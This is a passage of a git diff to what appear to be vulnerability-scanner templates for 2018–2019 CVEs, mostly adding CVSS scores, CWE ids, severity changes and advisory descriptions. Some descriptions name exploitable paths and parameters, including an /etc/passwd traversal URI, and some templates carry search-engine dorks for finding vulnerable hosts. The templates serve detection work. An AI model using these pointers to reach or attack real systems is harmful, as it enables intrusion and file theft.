+++ b/cves/2018/CVE-2018-5233.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 tags: cve,cve2018,xss,grav + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5233 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml index 13f88cb96b..f2a21c4a73 100644 --- a/cves/2018/CVE-2018-5316.yaml +++ b/cves/2018/CVE-2018-5316.yaml @@ -7,6 +7,11 @@ info: description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index 65848e8da0..fc531f1cd6 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 tags: cve,cve2018,joomla,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-6008 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-6910.yaml b/cves/2018/CVE-2018-6910.yaml index 03cc1ee5c9..dede5965e4 100644 --- a/cves/2018/CVE-2018-6910.yaml +++ b/cves/2018/CVE-2018-6910.yaml @@ -7,6 +7,11 @@ info: reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910 description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php tags: cve,cve2018,dedecms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-6910 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml index f9994ccfb5..d89c8df6dd 100644 --- a/cves/2018/CVE-2018-7251.yaml +++ b/cves/2018/CVE-2018-7251.yaml @@ -3,8 +3,20 @@ id: CVE-2018-7251 info: name: AnchorCMS Error Log Exposure author: pdteam - severity: medium + severity: critical tags: cve,cve2018,anchorcms,logs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." + reference: + - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html + - https://twitter.com/finnwea/status/965279233030393856 + - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html + - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 requests: - method: GET diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 8cb678bdfd..d05e72261a 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2018,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. reference: https://www.exploit-db.com/exploits/44340 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7422 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-7490.yaml b/cves/2018/CVE-2018-7490.yaml index a2cb244508..1e3744b1e1 100644 --- a/cves/2018/CVE-2018-7490.yaml +++ b/cves/2018/CVE-2018-7490.yaml @@ -5,6 +5,16 @@ info: author: madrobot severity: high tags: cve,cve2018,uwsgi,php,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 requests: - method: GET diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 9aff058ee4..13c2a5fc08 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 tags: cve,cve2018,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7600 + cwe-id: CWE-20 + description: "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations." requests: - raw: diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml index de3d622d4c..32b525bf7f 100644 --- a/cves/2018/CVE-2018-7700.yaml +++ b/cves/2018/CVE-2018-7700.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." requests: - method: GET diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml index e49839a2e0..4c909a65b6 100644 --- a/cves/2018/CVE-2018-8006.yaml +++ b/cves/2018/CVE-2018-8006.yaml @@ -5,6 +5,23 @@ info: author: pdteam severity: medium tags: cve,cve2018,apache,activemq,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-8006 + cwe-id: CWE-79 + description: "An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter." + reference: + - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt + - http://www.securityfocus.com/bid/105156 + - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E requests: - method: GET diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml index 8904dd11ea..55f1fd7a8c 100644 --- a/cves/2018/CVE-2018-8033.yaml +++ b/cves/2018/CVE-2018-8033.yaml @@ -6,6 +6,13 @@ info: severity: high description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 tags: cve,cve2018,apache,ofbiz,xxe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-8033 + cwe-id: CWE-200 + reference: + - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E requests: - raw: diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index 7341f180dd..01005c6032 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2018,appweb,auth-bypass reference: - https://github.com/embedthis/appweb/issues/610 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-8715 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml index ccef2695c1..022985a814 100644 --- a/cves/2018/CVE-2018-8719.yaml +++ b/cves/2018/CVE-2018-8719.yaml @@ -10,6 +10,11 @@ info: - https://vuldb.com/?id.115817 - https://www.cvedetails.com/cve/CVE-2018-8719/ tags: wordpress,wp-plugin,cve,cve2018,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8719 + cwe-id: CWE-532 requests: - method: GET diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml index 442020990c..1f57cd812d 100644 --- a/cves/2018/CVE-2018-8770.yaml +++ b/cves/2018/CVE-2018-8770.yaml @@ -8,6 +8,11 @@ info: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ tags: cve,cve2018,cobub,razor,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8770 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml index 13722267ef..3440542393 100644 --- a/cves/2018/CVE-2018-9118.yaml +++ b/cves/2018/CVE-2018-9118.yaml @@ -7,6 +7,11 @@ info: description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability reference: https://www.exploit-db.com/exploits/44417 tags: wordpress,wp-plugin,lfi,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-9118 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index d97e5a8118..49ed20338b 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -2,7 +2,7 @@ id: CVE-2018-9995 info: name: DVR Authentication Bypass author: princechaddha - severity: high + severity: critical description: | TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass @@ -14,6 +14,10 @@ info: - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ - https://www.exploit-db.com/exploits/44577/ tags: cve,cve2018,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-9995 requests: - method: GET diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index ff40e30a68..84af6836bc 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -4,12 +4,17 @@ info: name: Apache Solr - DataImportHandler RCE description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam - severity: critical + severity: high reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index 8527f6724d..5369a5b00a 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -3,7 +3,7 @@ id: CVE-2019-0221 info: name: Apache Tomcat XSS author: pikpikcu - severity: low + severity: medium reference: - https://seclists.org/fulldisclosure/2019/May/50 - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ @@ -14,6 +14,11 @@ info: therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. tags: cve,cve2019,apache,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-0221 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-0230.yaml b/cves/2019/CVE-2019-0230.yaml index 0c52c1b430..afe490d14c 100644 --- a/cves/2019/CVE-2019-0230.yaml +++ b/cves/2019/CVE-2019-0230.yaml @@ -7,8 +7,13 @@ info: reference: - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability - severity: high + severity: critical tags: struts,rce,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-0230 + cwe-id: CWE-915 requests: - method: GET diff --git a/cves/2019/CVE-2019-10068.yaml b/cves/2019/CVE-2019-10068.yaml index 939dbedfd4..f3c238c10a 100644 --- a/cves/2019/CVE-2019-10068.yaml +++ b/cves/2019/CVE-2019-10068.yaml @@ -12,6 +12,11 @@ info: - https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2019-10068 - https://github.com/rapid7/metasploit-framework/pull/13107 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10068 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml index 4df9c87c68..8a546703a7 100644 --- a/cves/2019/CVE-2019-10092.yaml +++ b/cves/2019/CVE-2019-10092.yaml @@ -9,6 +9,11 @@ info: - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd - https://httpd.apache.org/security/vulnerabilities_24.html tags: cve,cve2019,apache,htmli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10092 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index cb37d90548..93c87f6f1b 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -3,13 +3,19 @@ id: CVE-2019-1010287 info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu - severity: high + severity: medium reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ # demo tags: cve,cve2019,timesheet,xss additional-fields: google-dork: inurl:"/timesheet/login.php" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." requests: - raw: # Metod POST From login.php diff --git a/cves/2019/CVE-2019-10475.yaml b/cves/2019/CVE-2019-10475.yaml index ed170a3bfe..bd50686df4 100644 --- a/cves/2019/CVE-2019-10475.yaml +++ b/cves/2019/CVE-2019-10475.yaml @@ -5,6 +5,16 @@ info: author: madrobot severity: medium tags: cve,cve2019,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10475 + cwe-id: CWE-79 + description: "A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin." + reference: + - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 + - http://www.openwall.com/lists/oss-security/2019/10/23/2 + - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index afd00e4a16..d5cbcb989d 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -3,11 +3,17 @@ id: CVE-2019-11013 info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko - severity: high + severity: medium reference: - https://www.exploit-db.com/exploits/47301 - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." requests: - method: GET diff --git a/cves/2019/CVE-2019-11248.yaml b/cves/2019/CVE-2019-11248.yaml index 4f65493181..7d3e107c36 100644 --- a/cves/2019/CVE-2019-11248.yaml +++ b/cves/2019/CVE-2019-11248.yaml @@ -3,12 +3,17 @@ id: CVE-2019-11248 info: name: exposed_pprof author: 0xceeb - severity: medium + severity: high tags: cve,cve2019,debug description: The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2019-11248 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-11510.yaml b/cves/2019/CVE-2019-11510.yaml index 7effbabf9b..5be81356d6 100644 --- a/cves/2019/CVE-2019-11510.yaml +++ b/cves/2019/CVE-2019-11510.yaml @@ -3,9 +3,15 @@ id: CVE-2019-11510 info: name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability author: organiccrap - severity: high + severity: critical reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html tags: cve,cve2019,pulsesecure,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-11510 + cwe-id: CWE-22 + description: "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability ." requests: - method: GET diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml index a26ec36e14..095100bde7 100644 --- a/cves/2019/CVE-2019-11580.yaml +++ b/cves/2019/CVE-2019-11580.yaml @@ -21,6 +21,10 @@ info: reference: - https://github.com/jas502n/CVE-2019-11580 - https://jira.atlassian.com/browse/CWD-5388 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11580 requests: - method: GET diff --git a/cves/2019/CVE-2019-11581.yaml b/cves/2019/CVE-2019-11581.yaml index ec056b1abc..0f8fb34038 100644 --- a/cves/2019/CVE-2019-11581.yaml +++ b/cves/2019/CVE-2019-11581.yaml @@ -7,6 +7,11 @@ info: severity: critical reference: https://github.com/jas502n/CVE-2019-11581 tags: cve,cve2019,atlassian,jira,ssti,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11581 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 2053f87579..9c68042cfd 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -16,6 +16,11 @@ info: - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild - https://wpscan.com/vulnerability/9254 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-11869 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml index a069b1acf1..a0cc848279 100644 --- a/cves/2019/CVE-2019-12276.yaml +++ b/cves/2019/CVE-2019-12276.yaml @@ -9,6 +9,11 @@ info: - https://security401.com/grandnode-path-traversal/ - https://www.cvedetails.com/cve/CVE-2019-12276 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml index a9e7754a57..6447b9ad1c 100644 --- a/cves/2019/CVE-2019-12314.yaml +++ b/cves/2019/CVE-2019-12314.yaml @@ -3,13 +3,18 @@ id: CVE-2019-12314 info: name: Deltek Maconomy 2.2.5 LFIl author: madrobot - severity: high + severity: critical tags: cve,cve2019,lfi description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. reference: http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12314 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index c2dfd74c28..ea015d4b9d 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - https://webport.se/nedladdningar/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-12461 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml index 5a28c889a4..2c649f6e12 100644 --- a/cves/2019/CVE-2019-12593.yaml +++ b/cves/2019/CVE-2019-12593.yaml @@ -13,6 +13,11 @@ info: - https://www.icewarp.com/downloads/trial/ # software link additional-fields: google-dork: Powered By IceWarp 10.4.4 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12593 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 00eb781972..6d8e56152d 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -10,6 +10,11 @@ info: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index db7a7ffd97..ec398f19ae 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -13,6 +13,11 @@ info: - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12725 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 14ca50d4c4..747ee42f66 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-13101 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 41c5e358b9..7d3c23a851 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml @@ -7,6 +7,11 @@ info: reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-13462 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2019/CVE-2019-14205.yaml b/cves/2019/CVE-2019-14205.yaml index 05fcd12672..41b27f1e70 100644 --- a/cves/2019/CVE-2019-14205.yaml +++ b/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,11 @@ info: tags: cve,cve2019,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Nevma Adaptive 